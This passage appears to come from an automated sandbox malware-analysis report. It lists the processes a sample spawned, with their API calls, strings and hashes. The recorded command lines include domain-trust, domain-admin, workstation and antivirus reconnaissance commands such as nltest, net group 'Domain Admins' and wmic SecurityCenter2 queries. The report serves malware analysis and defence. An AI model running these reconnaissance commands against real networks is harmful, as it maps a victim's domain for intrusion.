MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	11:45:04
Start date:	03/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	11:45:04
Start date:	03/12/2024
Path:	C:\Windows\System32\nltest.exe
Wow64 process (32bit):	false
Commandline:	nltest /domain_trusts /all_trusts
Imagebase:	0x7ff7b5590000
File size:	540'672 bytes
MD5 hash:	70E221CE763EA128DBA484B2E4903DE1
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	11:45:04
Start date:	03/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	/c net view /all /domain
Imagebase:	0x7ff693270000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	11:45:04
Start date:	03/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	11:45:04
Start date:	03/12/2024
Path:	C:\Windows\System32\net.exe
Wow64 process (32bit):	false
Commandline:	net view /all /domain
Imagebase:	0x7ff765000000
File size:	59'904 bytes
MD5 hash:	0BD94A338EEA5A4E1F2830AE326E6D19
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	11:45:17
Start date:	03/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	/c net view /all
Imagebase:	0x7ff693270000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	11:45:17
Start date:	03/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	11:45:17
Start date:	03/12/2024
Path:	C:\Windows\System32\net.exe
Wow64 process (32bit):	false
Commandline:	net view /all
Imagebase:	0x7ff765000000
File size:	59'904 bytes
MD5 hash:	0BD94A338EEA5A4E1F2830AE326E6D19
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	11:45:30
Start date:	03/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	/c net group "Domain Admins" /domain
Imagebase:	0x7ff693270000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	11:45:30
Start date:	03/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	11:45:30
Start date:	03/12/2024
Path:	C:\Windows\System32\net.exe
Wow64 process (32bit):	false
Commandline:	net group "Domain Admins" /domain
Imagebase:	0x7ff765000000
File size:	59'904 bytes
MD5 hash:	0BD94A338EEA5A4E1F2830AE326E6D19
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	11:45:30
Start date:	03/12/2024
Path:	C:\Windows\System32\net1.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\net1 group "Domain Admins" /domain
Imagebase:	0x7ff6cf6b0000
File size:	183'808 bytes
MD5 hash:	55693DF2BB3CBE2899DFDDF18B4EB8C9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	11:45:30
Start date:	03/12/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	/Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List
Imagebase:	0x7ff7a7bd0000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	11:45:30
Start date:	03/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	11:45:31
Start date:	03/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	/c net config workstation
Imagebase:	0x7ff693270000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	11:45:31
Start date:	03/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	11:45:31
Start date:	03/12/2024
Path:	C:\Windows\System32\net.exe
Wow64 process (32bit):	false
Commandline:	net config workstation
Imagebase:	0x7ff765000000
File size:	59'904 bytes
MD5 hash:	0BD94A338EEA5A4E1F2830AE326E6D19
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	11:45:31
Start date:	03/12/2024
Path:	C:\Windows\System32\net1.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\net1 config workstation
Imagebase:	0x7ff6cf6b0000
File size:	183'808 bytes
MD5 hash:	55693DF2BB3CBE2899DFDDF18B4EB8C9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	11:45:32
Start date:	03/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	/c wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName \| findstr /V /B /C:displayName \|\| echo No Antivirus installed
Imagebase:	0x7ff693270000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	11:45:32
Start date:	03/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	11:45:32
Start date:	03/12/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName
Imagebase:	0x7ff7a7bd0000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	11:45:32
Start date:	03/12/2024
Path:	C:\Windows\System32\findstr.exe
Wow64 process (32bit):	false
Commandline:	findstr /V /B /C:displayName
Imagebase:	0x7ff7129c0000
File size:	36'352 bytes
MD5 hash:	804A6AE28E88689E0CF1946A6CB3FEE5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	11:45:32
Start date:	03/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	/c whoami /groups
Imagebase:	0x7ff693270000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	11:45:32
Start date:	03/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	46
Start time:	11:45:32
Start date:	03/12/2024
Path:	C:\Windows\System32\whoami.exe
Wow64 process (32bit):	false
Commandline:	whoami /groups
Imagebase:	0x7ff6255f0000
File size:	73'728 bytes
MD5 hash:	A4A6924F3EAF97981323703D38FD99C4
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	1.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	38.3%
Total number of Nodes:	389
Total number of Limit Nodes:	10

Executed Functions

Function 00CB4BA0 Relevance: 36.5, APIs: 24, Instructions: 502
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00CB57C0: GetCurrentProcess.KERNEL32(00000008,?,665E9022,?,-00000010), ref: 00CB57D0
Part of subcall function 00CB57C0: OpenProcessToken.ADVAPI32(00000000), ref: 00CB57D7

CoInitialize.OLE32(00000000), ref: 00CB4C15
CoCreateInstance.OLE32(00CF72B0,00000000,00000004,00D05104,00000000,?), ref: 00CB4C45
CoUninitialize.COMBASE ref: 00CB5187
_com_issue_error.COMSUPP ref: 00CB51B5

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: Process$CreateCurrentInitializeInstanceOpenTokenUninitialize_com_issue_error
String ID:
API String ID: 928366108-0
Opcode ID: 8a3544a13ce6ef16a3b5d71bcaaff28736fda8ae0c4e097357f0887cc7a8295f
Instruction ID: b64da5457166fc758ee2381ab426f71de08696776a61e12544085615929ef903
Opcode Fuzzy Hash: 8a3544a13ce6ef16a3b5d71bcaaff28736fda8ae0c4e097357f0887cc7a8295f
Instruction Fuzzy Hash: 31229F70E04388DFEF11CFA8C948BEEBBB8AF55304F148199E409EB281D7759A45CB61

Function 00CB6A50 Relevance: 9.2, APIs: 4, Strings: 1, Instructions: 461
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00CB6AC8
OpenProcessToken.ADVAPI32(00000000,00000008,00000000), ref: 00CB6AD5
CloseHandle.KERNEL32(00000000), ref: 00CB6AF5

Strings

S-1-5-18, xrefs: 00CB6B69

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: Process$CloseCurrentHandleOpenToken
String ID: S-1-5-18
API String ID: 4052875653-4289277601
Opcode ID: a91b0b630428dfd52f3caa89a1e17aaf3a7fc21d1046974b047101fe85f0abf4
Instruction ID: d1cf589b5f0b1edfa200efb37e2aa6b3a91e5b61def7203f4895fdd87c55cde6
Opcode Fuzzy Hash: a91b0b630428dfd52f3caa89a1e17aaf3a7fc21d1046974b047101fe85f0abf4
Instruction Fuzzy Hash: 0A02E470900259CFDF14DFA4C955BEEBBB5FF05314F148258E812AB282EB34AE05DB90

Function 00CB57C0 Relevance: 6.0, APIs: 4, Instructions: 35
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(00000008,?,665E9022,?,-00000010), ref: 00CB57D0
OpenProcessToken.ADVAPI32(00000000), ref: 00CB57D7
GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?), ref: 00CB580C
CloseHandle.KERNEL32(?), ref: 00CB5822

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: ProcessToken$CloseCurrentHandleInformationOpen
String ID:
API String ID: 215268677-0
Opcode ID: 65fdd53c8e1aa134131ab522ae789636c71f36db452137e3c3da38b15fc6e216
Instruction ID: a9f4c5bc7a9f86b7e19f935adc3e5d691d15d790b643231e9e1ef74c70d052ea
Opcode Fuzzy Hash: 65fdd53c8e1aa134131ab522ae789636c71f36db452137e3c3da38b15fc6e216
Instruction Fuzzy Hash: 08F01D74148301ABEB109F20EC49BAE7BE8FF44700F508919F995D21A0DB79961CDB63

Function 00CBCDB0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCommandLineW.KERNEL32(665E9022,?,?,?,?,?,?,?,?,?,00CF56D5,000000FF), ref: 00CBCDE8

Part of subcall function 00CB1F80: LocalAlloc.KERNEL32(00000040,00000000,?,?,vector too long,00CB4251,665E9022,00000000,?,00000000,?,?,?,00CF4400,000000FF,?), ref: 00CB1F9D

ExitProcess.KERNEL32 ref: 00CBCEB1

Part of subcall function 00CB6600: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?), ref: 00CB667E

Strings

Full command line:, xrefs: 00CBCE13

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: AllocCommandCreateExitFileLineLocalProcess
String ID: Full command line:
API String ID: 1878577176-831861440
Opcode ID: 7f065876bc367d5f23ab370471b6bc3acd509d7dfd92614c9c7c14d5f9b1be4c
Instruction ID: 5c2beaa4be83c5afe3cb023e1a522ab06869677d06c2e1dc92ea36123e96ceef
Opcode Fuzzy Hash: 7f065876bc367d5f23ab370471b6bc3acd509d7dfd92614c9c7c14d5f9b1be4c
Instruction Fuzzy Hash: A421D371910154ABCB15FB60DC95BEE73A5AF54740F144118F816A72D1EF386B08D7A2

Function 00CB5E40 Relevance: 4.6, APIs: 3, Instructions: 85
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,00CB5E18,665E9022,?), ref: 00CB5EB4
GetLastError.KERNEL32(?,TokenIntegrityLevel,00000000,00000000,00CB5E18,665E9022,?), ref: 00CB5EBE
GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),?,00000000,00000000,?,TokenIntegrityLevel,00000000,00000000,00CB5E18,665E9022,?), ref: 00CB5F1A

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: InformationToken$ErrorLast
String ID:
API String ID: 2567405617-0
Opcode ID: f06103e4155bd1234983c5244250d6101ac71d83df38534cd5b48f264331a03d
Instruction ID: ce07bc5c810be70644cae845b9ced0ba82f5cb511fe62d409c15d8cc490e394f
Opcode Fuzzy Hash: f06103e4155bd1234983c5244250d6101ac71d83df38534cd5b48f264331a03d
Instruction Fuzzy Hash: D3315C71A00619AFDB24CF99CC45BBFFBF9FF44710F10452AE515A7280DBB5AA048BA0

Function 00CE70BB Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000008,?,?,?,00CE596A,00000001,00000364,?,00000006,000000FF,?,00CD6CE7,00000000,00CE3841,00000000), ref: 00CE70FC

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: fda7f67be4ecff0b9528f94e765dcfad45550bac147ba8458ad7a21611268815
Instruction ID: d96c2dbf7d50299f6f76f8fa752dfa1a4a70a50cc47c451c8588589e09da8233
Opcode Fuzzy Hash: fda7f67be4ecff0b9528f94e765dcfad45550bac147ba8458ad7a21611268815
Instruction Fuzzy Hash: AAF0B43120C3A06B9B225B239D06B6F7749AF51770B144311BD28DA190CE60ED01A6E1

Non-executed Functions

Function 00CB52F0 Relevance: 52.9, APIs: 14, Strings: 16, Instructions: 402
libraryloadersleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetWindowsDirectoryW.KERNEL32(?,00000104,00000000,?,?,?,?,?), ref: 00CB549C
GetForegroundWindow.USER32(00000000,?,?,?,?,?), ref: 00CB551D
ShellExecuteExW.SHELL32(?), ref: 00CB5601
ShellExecuteExW.SHELL32(?), ref: 00CB5637
GetModuleHandleW.KERNEL32(Kernel32.dll,GetProcessId,?,?,?,?,?,?), ref: 00CB567C
GetProcAddress.KERNEL32(00000000), ref: 00CB5685
AllowSetForegroundWindow.USER32(00000000), ref: 00CB568B
GetModuleHandleW.KERNEL32(Kernel32.dll,GetProcessId,?,?,?,?,?,?), ref: 00CB56AB
GetProcAddress.KERNEL32(00000000), ref: 00CB56AE
Sleep.KERNEL32(00000064,?,?,?,?,?,?), ref: 00CB56CA
EnumWindows.USER32(00CB5830,?), ref: 00CB56DF
BringWindowToTop.USER32(00000000), ref: 00CB56F4
WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?), ref: 00CB5711
GetExitCodeProcess.KERNEL32(?,?), ref: 00CB571B

Strings

GetProcessId, xrefs: 00CB5672, 00CB56A1
FilePath:<, xrefs: 00CB5589
ShellExecuteInfo members:, xrefs: 00CB5540
%s\System32\cmd.exe, xrefs: 00CB54A9
.bat, xrefs: 00CB5422
Kernel32.dll, xrefs: 00CB5677, 00CB56A6
Verb:<, xrefs: 00CB559E
Hidden, xrefs: 00CB55D6
Directory:<, xrefs: 00CB55B2
.cmd, xrefs: 00CB545F
Visible, xrefs: 00CB55DB, 00CB55EA
Window Visibility:, xrefs: 00CB55E3
/C ""%s" %s", xrefs: 00CB54C1
Parameters:<, xrefs: 00CB55C6
open, xrefs: 00CB54D5
runas, xrefs: 00CB54EC

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: Window$AddressExecuteForegroundHandleModuleProcShellWindows$AllowBringCodeDirectoryEnumExitObjectProcessSingleSleepWait
String ID: %s\System32\cmd.exe$.bat$.cmd$/C ""%s" %s"$Directory:<$FilePath:<$GetProcessId$Hidden$Kernel32.dll$Parameters:<$ShellExecuteInfo members:$Verb:<$Visible$Window Visibility:$open$runas
API String ID: 697762045-2796270252
Opcode ID: 5f7523f797f1dc86c80a6c2b522513d1188e31cea0f0e89b947a55a4c9f988cc
Instruction ID: 746b8af284240c07dd8e2134712b61d406e4fcc7a2cf03f9e67ac55f2f24534e
Opcode Fuzzy Hash: 5f7523f797f1dc86c80a6c2b522513d1188e31cea0f0e89b947a55a4c9f988cc
Instruction Fuzzy Hash: 80E1C171E00A099BDF10DFA8C884BEEB7B5EF44310F544269E819AB395EB349E45CF61

Function 00CBC870 Relevance: 14.4, APIs: 2, Strings: 6, Instructions: 366registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(?,?,00000000,00000001,?), ref: 00CBCBB6
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00D0E6D0,00000800), ref: 00CBCBD3

Strings

/RunAsAdmin , xrefs: 00CBC92B, 00CBC94C, 00CBC951
/DontWait , xrefs: 00CBC8D8, 00CBC8EE, 00CBC8F3
/HideWindow, xrefs: 00CBC98E, 00CBC9AC, 00CBC9B1
/LogFile, xrefs: 00CBCA07
/DIR , xrefs: 00CBC9F3
/EnforcedRunAsAdmin , xrefs: 00CBC893, 00CBC8A3, 00CBC8A8

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: OpenQueryValue
String ID: /DIR $/DontWait $/EnforcedRunAsAdmin $/HideWindow$/LogFile$/RunAsAdmin
API String ID: 4153817207-482544602
Opcode ID: 401ae014a6cbd01f0de0c948d43bf425f9f2c0e99b9437bb5a1a46a151a96322
Instruction ID: e4f565068f234b1425d1431cca6dcf86b413b22ab645fe4115cf1208d877578f
Opcode Fuzzy Hash: 401ae014a6cbd01f0de0c948d43bf425f9f2c0e99b9437bb5a1a46a151a96322
Instruction Fuzzy Hash: 11C1F535A042168BDB349F14D8C13FAB7A1EFA0740F58445EE8A9DB294E771CF82C7A5

Function 00CB3860 Relevance: 10.7, APIs: 7, Instructions: 227processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,665E9022,?), ref: 00CB38CB
CloseHandle.KERNEL32(00000000), ref: 00CB390B
Process32FirstW.KERNEL32(?,00000000), ref: 00CB395F
OpenProcess.KERNEL32(00000410,00000000,?), ref: 00CB397A
CloseHandle.KERNEL32(00000000), ref: 00CB3A8E
Process32NextW.KERNEL32(?,00000000), ref: 00CB3AA2
CloseHandle.KERNEL32(?), ref: 00CB3AF0

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: CloseHandle$Process32$CreateFirstNextOpenProcessSnapshotToolhelp32
String ID:
API String ID: 708755948-0
Opcode ID: a170a8a2562efb72041a2a7ca10d540e2f518481692ea66b7c5f49fdae3e5a11
Instruction ID: c5cf2a5d670200400fdad8bfca4514893dbf028dbd15c5ce0d9bc478bad348dc
Opcode Fuzzy Hash: a170a8a2562efb72041a2a7ca10d540e2f518481692ea66b7c5f49fdae3e5a11
Instruction Fuzzy Hash: 87A108B1901249DFDF10CFA9D988BEEBBF8BF48304F248159E915AB280D7745A44DBA1

Function 00CEF032 Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1436COMMONLIBRARYCODE

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 00CEF216

Strings

1#QNAN, xrefs: 00CEF145
1#IND, xrefs: 00CEF137
1#INF, xrefs: 00CEF168
1#SNAN, xrefs: 00CEF13E

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 8a93d6f6ce7c47c42d159fd89570bd776e88f6203a99c68e177734dc8ab1a0ef
Instruction ID: db34840669bf4f8026fe1578fe35eb2ea7dcbf94eca1c951e18fb2a42e90faf2
